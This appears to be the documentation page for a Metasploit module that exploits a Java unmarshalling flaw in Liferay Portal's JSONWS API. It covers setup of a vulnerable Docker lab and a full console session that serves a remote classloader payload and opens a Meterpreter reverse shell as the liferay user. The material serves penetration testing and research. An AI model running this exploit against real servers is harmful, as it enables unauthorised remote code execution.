William Vu
3.2 KiB
3.2 KiB
Vulnerable Application
Description
This module exploits a Java unmarshalling vulnerability via JSONWS in Liferay Portal versions < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, and 7.2.1 GA2 to execute code as the Liferay user. Tested against 7.2.0 GA1.
Setup
Note: You may want to increase Docker's memory capacity up to 4 GB. Liferay will crash at 2 GB or less. 4 GB seems to be the sweet spot.
Run docker run -it -p 8080:8080 liferay/portal:7.2.0-ga1 (note the
added 7.2.0-ga1 tag) as per Liferay's Docker Hub instructions.
Targets
Id Name
-- ----
0 Liferay Portal < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, 7.2.1 GA2
Verification Steps
Options
SRVPORT
If you are testing the Docker container, which binds to port 8080 by default, set this to a different port to bind the remote classloading server to.
Scenarios
Liferay Portal 7.2.0 GA1 from Docker Hub
msf5 > use exploit/multi/http/liferay_java_unmarshalling
msf5 exploit(multi/http/liferay_java_unmarshalling) > show missing
Module options (exploit/multi/http/liferay_java_unmarshalling):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
msf5 exploit(multi/http/liferay_java_unmarshalling) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(multi/http/liferay_java_unmarshalling) > set lhost 192.168.1.3
lhost => 192.168.1.3
msf5 exploit(multi/http/liferay_java_unmarshalling) > set srvport 8888
srvport => 8888
msf5 exploit(multi/http/liferay_java_unmarshalling) > run
[*] Started reverse TCP handler on 192.168.1.3:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Liferay 7.2.0 CE GA1 MAY be a vulnerable version. Please verify.
[*] Using URL: http://0.0.0.0:8888/
[*] Local IP: http://192.168.1.3:8888/
[+] Started remote classloader server at http://192.168.1.3:8888/
[*] Unmarshalling remote classloader at http://127.0.0.1:8080/api/jsonws/expandocolumn/update-column
[*] GET /Uphxohekruuokpedknflsriuafhrdsfk.class requested
[+] Sending constructor class
[*] GET /metasploit/Payload.class requested
[+] Sending payload class
[*] HEAD /metasploit.dat requested
[+] Sending 200
[*] GET /metasploit.dat requested
[+] Sending payload config
[*] HEAD /metasploit/Payload.class requested
[+] Sending 200
[*] GET /metasploit/Payload.class requested
[+] Sending payload class
[*] Sending stage (53928 bytes) to 192.168.1.3
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:58271) at 2020-04-08 07:05:47 -0500
[*] Server stopped.
meterpreter > getuid
Server username: liferay
meterpreter > sysinfo
Computer : 588a96d744cb
OS : Linux 4.19.76-linuxkit (amd64)
Meterpreter : java/linux
meterpreter >